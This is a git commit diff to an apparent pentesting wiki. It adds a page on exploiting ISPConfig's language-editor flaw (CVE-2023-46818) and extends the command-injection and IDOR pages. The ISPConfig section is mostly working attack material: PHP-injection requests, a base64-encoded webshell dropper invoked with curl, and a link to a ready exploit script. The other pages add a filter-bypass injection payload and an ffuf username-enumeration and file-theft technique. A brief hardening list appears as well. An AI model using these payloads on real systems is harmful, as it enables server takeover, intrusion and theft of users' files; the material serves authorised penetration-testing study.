Merge pull request #1360 from HackTricks-wiki/update_HTB_Nocturnal__IDOR___Command_Injection___Root_via_20250827_191622

HTB Nocturnal IDOR → Command Injection → Root via ISPConfig ...
2025-10-10 18:36:50 +00:00 · 2025-08-28 16:02:10 +02:00 · 2025-08-28 16:02:10 +02:00 · acbc6203ee
commit acbc6203ee
parent 4c7d69faac ff4d1db05b
5 changed files with 134 additions and 0 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -432,6 +432,7 @@
  - [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md)
  - [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md)
  - [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md)
+  - [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md)
  - [JBOSS](network-services-pentesting/pentesting-web/jboss.md)
  - [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md)
  - [Joomla](network-services-pentesting/pentesting-web/joomla.md)
--- a/src/network-services-pentesting/pentesting-web/README.md
+++ b/src/network-services-pentesting/pentesting-web/README.md
@ -82,6 +82,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 - [**Golang**](golang.md)
 - [**GraphQL**](graphql.md)
 - [**H2 - Java SQL database**](h2-java-sql-database.md)
+- [**ISPConfig**](ispconfig.md)
 - [**IIS tricks**](iis-internet-information-services.md)
 - [**Microsoft SharePoint**](microsoft-sharepoint.md)
 - [**JBOSS**](jboss.md)
--- a/src/network-services-pentesting/pentesting-web/ispconfig.md
+++ b/src/network-services-pentesting/pentesting-web/ispconfig.md
@ -0,0 +1,107 @@
+# ISPConfig
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Overview
+
+ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.
+
+Key default paths:
+- Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx.
+- Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).
+
+Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it:
+
+```bash
+ssh -L 9001:127.0.0.1:8080 user@target
+# then browse http://127.0.0.1:9001
+```
+
+## Language editor PHP code injection (CVE-2023-46818)
+
+- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
+- Preconditions:
+  - Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor)
+  - Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini`
+- Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context
+
+References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.
+
+### Manual exploitation flow
+
+1) Open/create a language file to obtain CSRF tokens
+
+Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`.
+
+2) Inject PHP via records[] and save
+
+Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:
+
+```http
+POST /admin/language_edit.php HTTP/1.1
+Host: 127.0.0.1:9001
+Content-Type: application/x-www-form-urlencoded
+Cookie: ispconfig_auth=...
+
+lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
+```
+
+Out-of-band test (observe ICMP):
+
+```http
+records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
+```
+
+3) Write files and drop a webshell
+
+Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`):
+
+```http
+records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
+```
+
+Then write a simple webshell using base64 to avoid bad characters in the POST body:
+
+```http
+records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
+```
+
+Use it:
+
+```bash
+curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
+```
+
+If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.
+
+### Python PoC
+
+A ready-to-use exploit automates token handling and payload delivery:
+- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
+
+Example run:
+
+```bash
+python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
+```
+
+### Hardening
+
+- Upgrade to 3.2.11p1 or later
+- Disable the language editor unless strictly needed:
+
+```
+admin_allow_langedit=no
+```
+
+- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
+- Enforce strong authentication for the built-in `admin` account
+
+## References
+
+- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/)
+- [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
+- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
+- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
+
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/pentesting-web/command-injection.md
+++ b/src/pentesting-web/command-injection.md
@ -19,6 +19,7 @@ ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
 ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
 ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
 ls %0A id # %0A Execute both (RECOMMENDED)
+ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

 #Only unix supported
 `ls` # ``
@ -170,5 +171,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
 - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
+- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
+- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)

 {{#include ../banners/hacktricks-training.md}}
--- a/src/pentesting-web/idor.md
+++ b/src/pentesting-web/idor.md
@ -38,6 +38,27 @@ for id in $(seq 64185742 64185700); do
 done
 ```

+---
+
+### Error-response oracle for user/file enumeration
+
+When a download endpoint accepts both a username and a filename (e.g. `/view.php?username=<u>&file=<f>`), subtle differences in error messages often create an oracle:
+
+- Non-existent username → "User not found"
+- Bad filename but valid extension → "File does not exist" (sometimes also lists available files)
+- Bad extension → validation error
+
+With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the "user not found" string to discover valid users:
+
+```bash
+ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
+  -b 'PHPSESSID=<session-cookie>' \
+  -w /opt/SecLists/Usernames/Names/names.txt \
+  -fr 'User not found'
+```
+
+Once valid usernames are identified, request specific files directly (e.g., `/view.php?username=amanda&file=privacy.odt`). This pattern commonly leads to unauthorized disclosure of other users’ documents and credential leakage.
+
 ---
 ## 2. Real-World Case Study – McHire Chatbot Platform (2025)

@ -86,4 +107,5 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
 * [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds)
 * [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
 * [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
+* [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
 {{#include ../banners/hacktricks-training.md}}